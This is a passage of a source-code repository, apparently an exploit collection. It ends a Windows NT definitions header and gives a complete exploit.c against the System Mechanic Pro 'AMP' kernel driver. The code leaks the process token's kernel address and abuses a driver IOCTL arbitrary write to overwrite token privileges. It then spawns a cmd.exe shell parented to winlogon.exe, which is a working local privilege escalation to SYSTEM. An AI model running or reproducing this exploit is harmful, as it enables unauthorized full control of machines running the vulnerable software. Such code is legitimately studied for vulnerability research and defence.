SystemSpacesBootInformation = 214, 253 | SystemFwRamdiskInformation = 215, 254 | SystemWheaIpmiHardwareInformation = 216, 255 | SystemDifSetRuleClassInformation = 217, 256 | SystemDifClearRuleClassInformation = 218, 257 | SystemDifApplyPluginVerificationOnDriver = 219, 258 | SystemDifRemovePluginVerificationOnDriver = 220, 259 | SystemShadowStackInformation = 221, 260 | SystemBuildVersionInformation = 222, 261 | SystemPoolLimitInformation = 223, 262 | SystemCodeIntegrityAddDynamicStore = 224, 263 | SystemCodeIntegrityClearDynamicStores = 225, 264 | SystemDifPoolTrackingInformation = 226, 265 | SystemPoolZeroingInformation = 227, 266 | SystemDpcWatchdogInformation = 228, 267 | SystemDpcWatchdogInformation2 = 229, 268 | SystemSupportedProcessorArchitectures2 = 230, 269 | SystemSingleProcessorRelationshipInformation = 231, 270 | SystemXfgCheckFailureInformation = 232, 271 | SystemIommuStateInformation = 233, 272 | SystemHypervisorMinrootInformation = 234, 273 | SystemHypervisorBootPagesInformation = 235, 274 | SystemPointerAuthInformation = 236, 275 | SystemSecureKernelDebuggerInformation = 237, 276 | SystemOriginalImageFeatureInformation = 238, 277 | MaxSystemInfoClass = 239 278 | } SYSTEM_INFORMATION_CLASS; 279 | 280 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO 281 | { 282 | unsigned short UniqueProcessId; 283 | unsigned short CreatorBackTraceIndex; 284 | unsigned char ObjectTypeIndex; 285 | unsigned char HandleAttributes; 286 | unsigned short HandleValue; 287 | void* Object; 288 | unsigned long GrantedAccess; 289 | long __PADDING__[1]; 290 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 291 | 292 | typedef struct _SYSTEM_HANDLE_INFORMATION 293 | { 294 | ULONG NumberOfHandles; 295 | struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; 296 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; 297 | 298 | typedef struct _UNICODE_STRING { 299 | USHORT Length; 300 | USHORT MaximumLength; 301 | PWSTR Buffer; 302 | } UNICODE_STRING, * PUNICODE_STRING; 303 | 304 | typedef struct _OBJECT_ATTRIBUTES 305 | { 306 | ULONG Length; 307 | HANDLE RootDirectory; 308 | PUNICODE_STRING ObjectName; 309 | ULONG Attributes; 310 | PVOID SecurityDescriptor; 311 | PVOID SecurityQualityOfService; 312 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 313 | 314 | typedef struct _IO_STATUS_BLOCK 315 | { 316 | union 317 | { 318 | NTSTATUS Status; 319 | PVOID Pointer; 320 | }; 321 | ULONG_PTR Information; 322 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 323 | 324 | typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)( 325 | __in SYSTEM_INFORMATION_CLASS SystemInformationClass, 326 | __inout PVOID SystemInformation, 327 | __in ULONG SystemInformationLength, 328 | __out_opt PULONG ReturnLength 329 | ); 330 | 331 | typedef VOID(NTAPI* pRtlInitUnicodeString)( 332 | _Out_ PUNICODE_STRING DestinationString, 333 | _In_opt_z_ PCWSTR SourceString 334 | ); 335 | 336 | typedef NTSTATUS(NTAPI* pNtCreateFile)( 337 | _Out_ PHANDLE FileHandle, 338 | _In_ ACCESS_MASK DesiredAccess, 339 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 340 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 341 | _In_opt_ PLARGE_INTEGER AllocationSize, 342 | _In_ ULONG FileAttributes, 343 | _In_ ULONG ShareAccess, 344 | _In_ ULONG CreateDisposition, 345 | _In_ ULONG CreateOptions, 346 | _In_reads_bytes_opt_(EaLength) PVOID EaBuffer, 347 | _In_ ULONG EaLength 348 | ); 349 | 350 | typedef 351 | VOID 352 | (NTAPI* PIO_APC_ROUTINE) ( 353 | IN PVOID ApcContext, 354 | IN PIO_STATUS_BLOCK IoStatusBlock, 355 | IN ULONG Reserved 356 | ); 357 | 358 | typedef NTSTATUS(NTAPI* pNtDeviceIoControlFile)( 359 | _In_ HANDLE FileHandle, 360 | _In_opt_ HANDLE Event, 361 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 362 | _In_opt_ PVOID ApcContext, 363 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 364 | _In_ ULONG IoControlCode, 365 | _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, 366 | _In_ ULONG InputBufferLength, 367 | _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, 368 | _In_ ULONG OutputBufferLength 369 | ); 370 | -------------------------------------------------------------------------------- /Windows/SystemMechanicPro/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "Defs.h" 7 | 8 | #pragma comment(lib, "ntdll.lib") 9 | 10 | pNtQuerySystemInformation NtQuerySystemInformation = NULL; 11 | pRtlInitUnicodeString RtlInitUnicodeString = NULL; 12 | pNtCreateFile NtCreateFile = NULL; 13 | pNtDeviceIoControlFile NtDeviceIoControlFile = NULL; 14 | 15 | UINT_PTR GetTokenAddress() 16 | { 17 | NTSTATUS status; 18 | HANDLE currentProcess = GetCurrentProcess(); 19 | HANDLE currentToken = NULL; 20 | UINT_PTR tokenAddress = 0; 21 | ULONG ulBytes = 0; 22 | PSYSTEM_HANDLE_INFORMATION handleTableInfo = NULL; 23 | 24 | BOOL success = OpenProcessToken(currentProcess, TOKEN_QUERY, ¤tToken); 25 | if (!success) 26 | { 27 | wprintf(L"[!] Couldn't open a handle to the current process token. (Error code: %d)\n", GetLastError()); 28 | return 0; 29 | } 30 | // Allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API 31 | while ((status = NtQuerySystemInformation(SystemHandleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH) 32 | { 33 | if (handleTableInfo != NULL) 34 | { 35 | handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes); 36 | } 37 | 38 | else 39 | { 40 | handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes); 41 | } 42 | } 43 | 44 | if (status == 0) 45 | { 46 | // iterate over the system's handle table and look for the handles beloging to our process 47 | for (ULONG i = 0; i < handleTableInfo->NumberOfHandles; i++) 48 | { 49 | // if it finds our process and the handle matches the current token handle we already opened, print it 50 | if (handleTableInfo->Handles[i].UniqueProcessId == GetCurrentProcessId() && handleTableInfo->Handles[i].HandleValue == (USHORT)currentToken) 51 | { 52 | tokenAddress = (UINT_PTR)handleTableInfo->Handles[i].Object; 53 | break; 54 | } 55 | } 56 | } 57 | else 58 | { 59 | if (handleTableInfo != NULL) 60 | { 61 | wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status); 62 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 63 | CloseHandle(currentToken); 64 | return 0; 65 | } 66 | } 67 | 68 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 69 | 70 | return tokenAddress; 71 | } 72 | 73 | DWORD getProcessId(const wchar_t* process) 74 | { 75 | HANDLE hSnapShot; 76 | PROCESSENTRY32 pe32; 77 | DWORD pid; 78 | 79 | 80 | hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 81 | 82 | if (hSnapShot == INVALID_HANDLE_VALUE) 83 | { 84 | printf("\n[-] Failed to create handle CreateToolhelp32Snapshot()\n\n"); 85 | return -1; 86 | } 87 | 88 | pe32.dwSize = sizeof(PROCESSENTRY32); 89 | 90 | if (Process32First(hSnapShot, &pe32) == FALSE) 91 | { 92 | printf("\n[-] Failed to call Process32First()\n\n"); 93 | return -1; 94 | } 95 | 96 | do 97 | { 98 | if (_wcsicmp(pe32.szExeFile, process) == 0) 99 | { 100 | pid = pe32.th32ProcessID; 101 | return pid; 102 | } 103 | } while (Process32Next(hSnapShot, &pe32)); 104 | 105 | CloseHandle(hSnapShot); 106 | return 0; 107 | } 108 | 109 | int spawnShell() 110 | { 111 | const wchar_t* process = L"winlogon.exe"; 112 | DWORD pid; 113 | HANDLE hProcess; 114 | 115 | pid = getProcessId(process); 116 | 117 | if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL) 118 | { 119 | wprintf(L"\n[-] Unable to open %ws process\n\n", process); 120 | return -1; 121 | } 122 | wprintf(L"\n[+] Opened %ws process pid=%d with PROCESS_ALL_ACCESS rights", process, pid); 123 | 124 | SIZE_T size; 125 | STARTUPINFOEXW siex = { 0 }; 126 | siex.StartupInfo.cb = sizeof(siex); 127 | siex.lpAttributeList = NULL; 128 | 129 | InitializeProcThreadAttributeList(NULL, 1, 0, &size); 130 | siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size); 131 | InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &size); 132 | 133 | UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProcess, sizeof(hProcess), NULL, NULL); 134 | 135 | PROCESS_INFORMATION pi; 136 | WCHAR cmdPath[] = L"C:\\Windows\\System32\\cmd.exe"; 137 | if (!CreateProcessW(NULL, cmdPath, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&siex, &pi)) { 138 | wprintf(L"[-] Failed to create new process.\n"); 139 | wprintf(L" |-> %d\n", GetLastError()); 140 | HeapFree(GetProcessHeap(), 0, siex.lpAttributeList); 141 | return FALSE; 142 | } 143 | 144 | CloseHandle(pi.hThread); 145 | CloseHandle(pi.hProcess); 146 | HeapFree(GetProcessHeap(), 0, siex.lpAttributeList); 147 | 148 | return 0; 149 | } 150 | 151 | int init_ntdll() 152 | { 153 | HMODULE hNtdll = GetModuleHandleW(L"ntdll"); 154 | if (hNtdll == NULL) 155 | { 156 | wprintf(L"[!] Failed to load ntdll.dll! (Error code: %d)\n", GetLastError()); 157 | return 0; 158 | } 159 | 160 | NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"); 161 | RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString"); 162 | NtCreateFile = (pNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile"); 163 | NtDeviceIoControlFile = (pNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile"); 164 | if (!NtQuerySystemInformation && !RtlInitUnicodeString && !NtCreateFile && !NtDeviceIoControlFile) 165 | { 166 | wprintf(L"[!] Failed to resolve ntdll functions\n"); 167 | return 0; 168 | } 169 | return 1; 170 | } 171 | 172 | int arbitrary_write(HANDLE hDevice, input_buffer* input_buffer, size_t inputbuffer) 173 | { 174 | IO_STATUS_BLOCK ioStatus; 175 | NTSTATUS status; 176 | DWORD dwbytesreturned = 0; 177 | 178 | status = NtDeviceIoControlFile(hDevice, NULL, NULL, NULL, &ioStatus, IOCTL_trigger_bug, input_buffer, inputbuffer, NULL, dwbytesreturned); 179 | 180 | if (status == NOERROR) 181 | { 182 | return 1; 183 | } 184 | else 185 | { 186 | wprintf(L"[!] arbitrary_write failed with 0x%X\n", status); 187 | return 0; 188 | } 189 | } 190 | 191 | int main() 192 | { 193 | if (!init_ntdll()) 194 | { 195 | return -1; 196 | } 197 | 198 | NTSTATUS status; 199 | HANDLE hDevice, eventHandle = NULL; 200 | UNICODE_STRING deviceName; 201 | OBJECT_ATTRIBUTES objAttr; 202 | IO_STATUS_BLOCK ioStatus; 203 | RtlInitUnicodeString(&deviceName, L"\\Device\\AMP"); 204 | InitializeObjectAttributes(&objAttr, &deviceName, OBJ_CASE_INSENSITIVE, 0, 0); 205 | wprintf(L"[^] Trying to open a handle to %ws\n", deviceName.Buffer); 206 | status = NtCreateFile(&hDevice, GENERIC_READ | GENERIC_WRITE, 207 | &objAttr, &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL, 208 | FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0); 209 | 210 | if (status != 0) 211 | { 212 | wprintf(L"[!] Failed to open a handle to %ws (NTSTATUS code: 0x%X)\n", deviceName.Buffer, status); 213 | return -1; 214 | } 215 | 216 | wprintf(L"[+] Opened a handle successfully %p\n", hDevice); 217 | wprintf(L"[*] Leaking the current token address\n"); 218 | UINT_PTR tokenAddress = GetTokenAddress(); 219 | 220 | if (tokenAddress == 0) 221 | { 222 | wprintf(L"[!] Failed to get the token address\n"); 223 | return -1; 224 | } 225 | 226 | wprintf(L"[+] Current token address: 0x%p\n", tokenAddress); 227 | 228 | wprintf(L"[*] Overwritting the _SEP_TOKEN_PRIVILEGES...\n"); 229 | arguments_to_func args = { 1, 10, 3, 4}; 230 | input_buffer input_buffer1 = {5, 0, &args, (PVOID)(tokenAddress + 0x41)}; 231 | input_buffer input_buffer2 = {5, 0, &args, (PVOID)(tokenAddress + 0x49)}; 232 | input_buffer input_buffer3 = {5, 0, &args, (PVOID)(tokenAddress + 0x51)}; 233 | 234 | if(arbitrary_write(hDevice, &input_buffer1, sizeof(input_buffer1)) && arbitrary_write(hDevice, &input_buffer2, sizeof(input_buffer2)) 235 | && arbitrary_write(hDevice, &input_buffer3, sizeof(input_buffer3))) 236 | { 237 | wprintf(L"[+] Overwrite was successful\n"); 238 | } 239 | else 240 | { 241 | wprintf(L"[!] Overwrite failed\n"); 242 | CloseHandle(hDevice); 243 | return -1; 244 | } 245 | 246 | CloseHandle(hDevice); 247 | wprintf(L"[*] Spawning a shell\n"); 248 | spawnShell(); 249 | 250 | return 0; 251 | } 252 | --------------------------------------------------------------------------------